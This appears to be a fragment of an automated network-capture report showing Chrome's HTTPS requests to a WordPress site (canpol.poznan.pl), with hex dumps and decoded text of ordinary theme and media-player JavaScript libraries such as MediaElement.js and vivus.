                                                            2025-01-15 10:08:04 UTC8000INData Raw: 09 09 2f 2f 6e 65 63 74 61 72 20 73 6c 69 64 65 72 0a 09 09 24 6e 73 53 65 6c 65 63 74 6f 72 20 3d 20 27 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 66 75 6c 6c 73 63 72 65 65 6e 3d 22 74 72 75 65 22 5d 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22 74 72 75 65 22 5d 2c 20 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 66 75 6c 6c 73 63 72 65 65 6e 3d 22 74 72 75 65 22 5d 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22 62 6f 78 65 64 2d 66 75 6c 6c 2d 77 69 64 74 68 22 5d 27 3b 0a 09 09 69 66 28 24 28 27 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 66 75 6c 6c 73 63 72 65 65 6e 3d 22 74 72 75 65 22 5d 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22
                                                            Data Ascii: //nectar slider$nsSelector = '.nectar-slider-wrap[data-fullscreen="true"][data-full-width="true"], .nectar-slider-wrap[data-fullscreen="true"][data-full-width="boxed-full-width"]';if($('.nectar-slider-wrap[data-fullscreen="true"][data-full-width="
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 6f 70 27 3a 27 30 27 2c 27 6c 65 66 74 27 3a 27 30 27 7d 29 3b 0a 09 09 20 20 20 20 20 20 20 20 09 09 09 24 6e 65 78 74 49 6e 64 65 78 52 6f 77 46 70 54 61 62 6c 65 2e 63 73 73 28 7b 27 74 72 61 6e 73 66 6f 72 6d 27 3a 27 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 25 29 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 27 2c 20 27 77 69 6c 6c 2d 63 68 61 6e 67 65 27 3a 27 74 72 61 6e 73 66 6f 72 6d 27 7d 29 3b 0a 09 09 20 20 20 20 20 20 20 20 09 09 09 24 6e 65 78 74 49 6e 64 65 78 52 6f 77 49 6e 6e 65 72 2e 63 73 73 28 7b 27 74 72 61 6e 73 66 6f 72 6d 27 3a 27 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 27 2c 20 20 27 77 69 6c 6c 2d 63 68 61 6e 67 65 27 3a 27 74 72 61 6e 73 66 6f 72 6d 27 7d 29 3b 0a 09 20 20 20 20 20
                                                            Data Ascii: op':'0','left':'0'}); $nextIndexRowFpTable.css({'transform':'translateY(100%) translateZ(0)', 'will-change':'transform'}); $nextIndexRowInner.css({'transform':'translateY(-50%) translateZ(0)', 'will-change':'transform'});
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 6f 74 74 6f 6d 22 5d 20 3e 20 2e 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 2d 77 72 61 70 27 29 2e 63 73 73 28 7b 27 74 72 61 6e 73 69 74 69 6f 6e 27 3a 27 6e 6f 6e 65 27 2c 27 74 72 61 6e 73 66 6f 72 6d 27 3a 27 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 31 30 30 25 29 27 7d 29 3b 0a 09 09 09 24 28 27 2e 77 70 62 5f 63 6f 6c 75 6d 6e 2e 68 61 73 2d 61 6e 69 6d 61 74 69 6f 6e 5b 64 61 74 61 2d 61 6e 69 6d 61 74 69 6f 6e 3d 22 72 65 76 65 61 6c 2d 66 72 6f 6d 2d 62 6f 74 74 6f 6d 22 5d 20 3e 20 2e 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 2d 77 72 61 70 20 3e 20 2e 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 27 29 2e 63 73 73 28 7b 27 74 72 61 6e 73 69 74 69 6f 6e 27 3a 27 6e 6f 6e 65 27 2c 27 74 72 61 6e 73 66 6f 72 6d 27 3a 27 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 2d 39 30 25
                                                            Data Ascii: ottom"] > .column-inner-wrap').css({'transition':'none','transform':'translate(0, 100%)'});$('.wpb_column.has-animation[data-animation="reveal-from-bottom"] > .column-inner-wrap > .column-inner').css({'transition':'none','transform':'translate(0, -90%


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            86192.168.2.1649802178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC614OUTGET /wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.16 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC288INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:03 GMT
                                                            ETag: "267aa-620a930fbef5d"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 157610
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:04 UTC7904INData Raw: 2f 2a 21 0a 20 2a 20 4d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 6a 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 65 64 69 61 65 6c 65 6d 65 6e 74 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 57 72 61 70 70 65 72 20 74 68 61 74 20 6d 69 6d 69 63 73 20 6e 61 74 69 76 65 20 48 54 4d 4c 35 20 4d 65 64 69 61 45 6c 65 6d 65 6e 74 20 28 61 75 64 69 6f 20 61 6e 64 20 76 69 64 65 6f 29 0a 20 2a 20 75 73 69 6e 67 20 61 20 76 61 72 69 65 74 79 20 6f 66 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 28 70 75 72 65 20 4a 61 76 61 53 63 72 69 70 74 2c 20 46 6c 61 73 68 2c 20 69 66 72 61 6d 65 29 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 30 2d 32 30 31 37 2c 20 4a 6f 68 6e 20 44 79 65 72 20 28 68 74 74 70 3a 2f 2f 6a 2e 68 6e 2f 29 0a 20 2a 20 4c 69 63 65 6e
                                                            Data Ascii: /*! * MediaElement.js * http://www.mediaelementjs.com/ * * Wrapper that mimics native HTML5 MediaElement (audio and video) * using a variety of technologies (pure JavaScript, Flash, iframe) * * Copyright 2010-2017, John Dyer (http://j.hn/) * Licen
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 6e 67 74 68 3c 3d 30 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 25 31 30 30 3c 31 30 7c 7c 32 30 3c 3d 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 30 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 25 31 30 30 29 3f 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 32 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 33 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 33 5d 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 30 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 25 31 30 30 3d 3d 31 3f 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 32 3f
                                                            Data Ascii: ngth<=0?void 0:arguments[0])%100<10||20<=(arguments.length<=0?void 0:arguments[0])%100)?arguments.length<=2?void 0:arguments[2]:arguments.length<=3?void 0:arguments[3]},function(){return(arguments.length<=0?void 0:arguments[0])%100==1?arguments.length<=2?
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 65 72 2e 72 65 6e 64 65 72 65 72 73 5b 64 5d 3b 76 61 72 20 75 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 72 2e 6f 70 74 69 6f 6e 73 2c 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 6f 70 74 69 6f 6e 73 29 3b 72 65 74 75 72 6e 28 69 3d 72 2e 63 72 65 61 74 65 28 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2c 75 2c 74 29 29 2e 6e 61 6d 65 3d 65 2c 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 72 65 6e 64 65 72 65 72 73 5b 72 2e 6e 61 6d 65 5d 3d 69 2c 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 72 65 6e 64 65 72 65 72 3d 69 2c 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 72 65 6e 64 65 72 65 72 4e 61 6d 65 3d 65 2c 69 2e 73 68 6f 77 28 29 2c 21 30 7d 7d 72 65 74 75 72 6e 21 31 7d 2c 66 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 73 65 74 53 69 7a 65 3d 66 75
                                                            Data Ascii: er.renderers[d];var u=Object.assign(r.options,n.mediaElement.options);return(i=r.create(n.mediaElement,u,t)).name=e,n.mediaElement.renderers[r.name]=i,n.mediaElement.renderer=i,n.mediaElement.rendererName=e,i.show(),!0}}return!1},f.mediaElement.setSize=fu
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 6f 6e 28 65 29 7b 7b 69 66 28 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 74 3d 7b 7d 3b 69 66 28 6e 75 6c 6c 21 3d 65 29 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 65 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 6e 29 26 26 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 3d 65 2c 74 7d 7d 28 65 28 32 35 29 29 2c 68 3d 65 28 32 37 29 2c 76 3d 65 28 32 36 29 2c 67 3d 65 28 32 38 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 2e 63 6f 6e 66 69 67 2c 7b 75
                                                            Data Ascii: on(e){{if(e&&e.__esModule)return e;var t={};if(null!=e)for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(t[n]=e[n]);return t.default=e,t}}(e(25)),h=e(27),v=e(26),g=e(28);function a(e){return e&&e.__esModule?e:{default:e}}Object.assign(o.config,{u
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 69 74 6c 65 22 2c 61 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 22 2c 61 29 29 7d 29 7d 7d 29 7d 2c 7b 31 36 3a 31 36 2c 32 3a 32 2c 32 36 3a 32 36 2c 32 37 3a 32 37 2c 35 3a 35 7d 5d 2c 31 31 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 70 3d 72 28 65 28 32 29 29 2c 6f 3d 65 28 31 36 29 2c 69 3d 72 28 6f 29 2c 6d 3d 72 28 65 28 35 29 29 2c 79 3d 65 28 32 35 29 2c 45 3d 65 28 33 30 29 2c 62 3d 65 28 32 36 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 2e 63 6f 6e 66 69 67 2c 7b 65 6e 61 62 6c 65 50 72
                                                            Data Ascii: itle",a),d.setAttribute("aria-label",a))})}})},{16:16,2:2,26:26,27:27,5:5}],11:[function(e,t,n){"use strict";var p=r(e(2)),o=e(16),i=r(o),m=r(e(5)),y=e(25),E=e(30),b=e(26);function r(e){return e&&e.__esModule?e:{default:e}}Object.assign(o.config,{enablePr
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 69 76 65 7c 7c 67 2e 67 65 74 44 75 72 61 74 69 6f 6e 28 29 3d 3d 3d 31 2f 30 29 7b 69 66 28 21 72 26 26 67 2e 6f 70 74 69 6f 6e 73 2e 66 6f 72 63 65 4c 69 76 65 29 7b 76 61 72 20 61 3d 70 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 29 3b 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 67 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 22 62 72 6f 61 64 63 61 73 74 22 2c 61 2e 69 6e 6e 65 72 54 65 78 74 3d 6d 2e 64 65 66 61 75 6c 74 2e 74 28 22 6d 65 6a 73 2e 6c 69 76 65 2d 62 72 6f 61 64 63 61 73 74 22 29 2c 67 2e 73 6c 69 64 65 72 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 2c 67 2e 72 61 69 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 65 6c 73 65 20 72 26 26 28 67 2e 73 6c 69 64
                                                            Data Ascii: ive||g.getDuration()===1/0){if(!r&&g.options.forceLive){var a=p.default.createElement("span");a.className=g.options.classPrefix+"broadcast",a.innerText=m.default.t("mejs.live-broadcast"),g.slider.style.display="none",g.rail.appendChild(a)}}else r&&(g.slid
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 22 64 69 76 22 29 2c 6f 2e 63 61 70 74 69 6f 6e 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 69 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 22 63 61 70 74 69 6f 6e 73 2d 6c 61 79 65 72 20 22 2b 69 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 22 6c 61 79 65 72 22 2c 6f 2e 63 61 70 74 69 6f 6e 73 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 27 2b 69 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 22 63 61 70 74 69 6f 6e 73 2d 70 6f 73 69 74 69 6f 6e 20 22 2b 69 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 27 63 61 70 74 69 6f 6e 73 2d 70 6f 73 69 74 69 6f 6e 2d 68 6f 76 65 72 22 27 2b 72 2b 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 27 2b 69 2e 6f 70 74 69 6f 6e 73 2e
                                                            Data Ascii: "div"),o.captions.className=i.options.classPrefix+"captions-layer "+i.options.classPrefix+"layer",o.captions.innerHTML='<div class="'+i.options.classPrefix+"captions-position "+i.options.classPrefix+'captions-position-hover"'+r+'><span class="'+i.options.
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 2e 6f 70 74 69 6f 6e 73 2e 73 74 61 72 74 4c 61 6e 67 75 61 67 65 3d 3d 3d 6e 29 7b 6f 2e 63 68 65 63 6b 65 64 3d 21 30 3b 76 61 72 20 6c 3d 28 30 2c 6a 2e 63 72 65 61 74 65 45 76 65 6e 74 29 28 22 63 6c 69 63 6b 22 2c 6f 29 3b 6f 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6c 29 7d 7d 7d 2c 72 65 6d 6f 76 65 54 72 61 63 6b 42 75 74 74 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 4c 2e 64 65 66 61 75 6c 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 22 2b 65 29 3b 69 66 28 74 29 7b 76 61 72 20 6e 3d 74 2e 63 6c 6f 73 65 73 74 28 22 6c 69 22 29 3b 6e 26 26 6e 2e 72 65 6d 6f 76 65 28 29 7d 7d 2c 61 64 64 54 72 61 63 6b 42 75 74 74 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6f 3d 74 68 69 73 3b 22 22 3d 3d
                                                            Data Ascii: .options.startLanguage===n){o.checked=!0;var l=(0,j.createEvent)("click",o);o.dispatchEvent(l)}}},removeTrackButton:function(e){var t=L.default.getElementById(""+e);if(t){var n=t.closest("li");n&&n.remove()}},addTrackButton:function(e,t,n){var o=this;""==
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 67 6e 28 69 2e 64 65 66 61 75 6c 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 62 75 69 6c 64 76 6f 6c 75 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 6f 29 7b 69 66 28 21 50 2e 49 53 5f 41 4e 44 52 4f 49 44 26 26 21 50 2e 49 53 5f 49 4f 53 7c 7c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 68 69 64 65 56 6f 6c 75 6d 65 4f 6e 54 6f 75 63 68 44 65 76 69 63 65 73 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 73 3d 61 2e 69 73 56 69 64 65 6f 3f 61 2e 6f 70 74 69 6f 6e 73 2e 76 69 64 65 6f 56 6f 6c 75 6d 65 3a 61 2e 6f 70 74 69 6f 6e 73 2e 61 75 64 69 6f 56 6f 6c 75 6d 65 2c 72 3d 28 30 2c 54 2e 69 73 53 74 72 69 6e 67 29 28 61 2e 6f 70 74 69 6f 6e 73 2e 6d 75 74 65 54 65 78 74 29 3f 61 2e 6f 70 74 69 6f 6e 73 2e 6d 75 74 65 54 65 78 74 3a 77 2e 64 65 66 61 75 6c 74
                                                            Data Ascii: gn(i.default.prototype,{buildvolume:function(e,t,n,o){if(!P.IS_ANDROID&&!P.IS_IOS||!this.options.hideVolumeOnTouchDevices){var a=this,s=a.isVideo?a.options.videoVolume:a.options.audioVolume,r=(0,T.isString)(a.options.muteText)?a.options.muteText:w.default
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 6d 65 20 53 6c 69 64 65 72 22 2c 22 6d 65 6a 73 2e 74 69 6d 65 2d 68 65 6c 70 2d 74 65 78 74 22 3a 22 55 73 65 20 4c 65 66 74 2f 52 69 67 68 74 20 41 72 72 6f 77 20 6b 65 79 73 20 74 6f 20 61 64 76 61 6e 63 65 20 6f 6e 65 20 73 65 63 6f 6e 64 2c 20 55 70 2f 44 6f 77 6e 20 61 72 72 6f 77 73 20 74 6f 20 61 64 76 61 6e 63 65 20 74 65 6e 20 73 65 63 6f 6e 64 73 2e 22 2c 22 6d 65 6a 73 2e 6c 69 76 65 2d 62 72 6f 61 64 63 61 73 74 22 3a 22 4c 69 76 65 20 42 72 6f 61 64 63 61 73 74 22 2c 22 6d 65 6a 73 2e 76 6f 6c 75 6d 65 2d 68 65 6c 70 2d 74 65 78 74 22 3a 22 55 73 65 20 55 70 2f 44 6f 77 6e 20 41 72 72 6f 77 20 6b 65 79 73 20 74 6f 20 69 6e 63 72 65 61 73 65 20 6f 72 20 64 65 63 72 65 61 73 65 20 76 6f 6c 75 6d 65 2e 22 2c 22 6d 65 6a 73 2e 75 6e 6d 75 74 65
                                                            Data Ascii: me Slider","mejs.time-help-text":"Use Left/Right Arrow keys to advance one second, Up/Down arrows to advance ten seconds.","mejs.live-broadcast":"Live Broadcast","mejs.volume-help-text":"Use Up/Down Arrow keys to increase or decrease volume.","mejs.unmute


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            87192.168.2.1649805178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC416OUTGET /wp-content/themes/salient/js/vivus.min.js?ver=6.0.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:02 GMT
                                                            ETag: "2e8e-620a8e961b00b"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 11918
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:04 UTC7906INData Raw: 2f 2a 2a 0a 20 2a 20 76 69 76 75 73 20 2d 20 4a 61 76 61 53 63 72 69 70 74 20 6c 69 62 72 61 72 79 20 74 6f 20 6d 61 6b 65 20 64 72 61 77 69 6e 67 20 61 6e 69 6d 61 74 69 6f 6e 20 6f 6e 20 53 56 47 0a 20 2a 20 40 76 65 72 73 69 6f 6e 20 76 30 2e 32 2e 31 0a 20 2a 20 40 6c 69 6e 6b 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 78 77 65 6c 6c 69 74 6f 2f 76 69 76 75 73 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 4d 49 54 0a 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 72 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 72 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 50 61 74 68 66 6f 72 6d 65 72 20 5b 63 6f 6e 73 74 72 75 63
                                                            Data Ascii: /** * vivus - JavaScript library to make drawing animation on SVG * @version v0.2.1 * @link https://github.com/maxwellito/vivus * @license MIT */"use strict";!function(t,e){function r(r){if("undefined"==typeof r)throw new Error('Pathformer [construc
                                                            2025-01-15 10:08:04 UTC4012INData Raw: 65 61 6b 3b 63 61 73 65 22 69 6e 56 69 65 77 70 6f 72 74 22 3a 76 61 72 20 65 3d 74 68 69 73 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 69 73 49 6e 56 69 65 77 70 6f 72 74 28 65 2e 65 6c 2c 31 29 26 26 28 65 2e 70 6c 61 79 28 29 2c 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 72 29 29 7d 3b 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 72 29 2c 72 28 29 7d 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 53 74 61 74 75 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 3d 3d 3d 74 68 69 73 2e 63 75 72 72 65 6e 74 46 72 61 6d 65 3f 22 73 74 61 72 74 22 3a 74 68 69 73 2e 63 75 72 72 65 6e 74 46 72 61 6d 65 3d 3d 3d 74 68 69 73 2e 66 72 61 6d 65 4c 65 6e
                                                            Data Ascii: eak;case"inViewport":var e=this,r=function(){e.isInViewport(e.el,1)&&(e.play(),t.removeEventListener("scroll",r))};t.addEventListener("scroll",r),r()}},n.prototype.getStatus=function(){return 0===this.currentFrame?"start":this.currentFrame===this.frameLen


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            88192.168.2.1649806178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC608OUTGET /wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:03 GMT
                                                            ETag: "4a9-620a930fda4db"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1193
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:04 UTC1193INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 6f 69 64 20 30 3d 3d 3d 6d 65 6a 73 2e 70 6c 75 67 69 6e 73 26 26 28 6d 65 6a 73 2e 70 6c 75 67 69 6e 73 3d 7b 7d 2c 6d 65 6a 73 2e 70 6c 75 67 69 6e 73 2e 73 69 6c 76 65 72 6c 69 67 68 74 3d 5b 5d 2c 6d 65 6a 73 2e 70 6c 75 67 69 6e 73 2e 73 69 6c 76 65 72 6c 69 67 68 74 2e 70 75 73 68 28 7b 74 79 70 65 73 3a 5b 5d 7d 29 29 2c 6d 65 6a 73 2e 48 74 6d 6c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 53 68 69 6d 3d 6d 65 6a 73 2e 48 74 6d 6c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 53 68 69 6d 7c 7c 7b 67 65 74 54 79 70 65 46 72 6f 6d 46 69 6c 65 3a 6d 65 6a 73 2e 55 74 69 6c 73 2e 67 65 74 54 79 70 65 46 72 6f 6d 46 69 6c 65 7d 2c 76 6f 69 64 20 30 3d 3d 3d 6d 65 6a 73 2e 4d 65 64 69 61 46 65 61 74 75 72 65 73 26 26 28 6d 65 6a
                                                            Data Ascii: !function(a){void 0===mejs.plugins&&(mejs.plugins={},mejs.plugins.silverlight=[],mejs.plugins.silverlight.push({types:[]})),mejs.HtmlMediaElementShim=mejs.HtmlMediaElementShim||{getTypeFromFile:mejs.Utils.getTypeFromFile},void 0===mejs.MediaFeatures&&(mej


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            89192.168.2.1649804178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC603OUTGET /wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC283INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:04 GMT
                                                            ETag: "38a-620a93104f7d1"
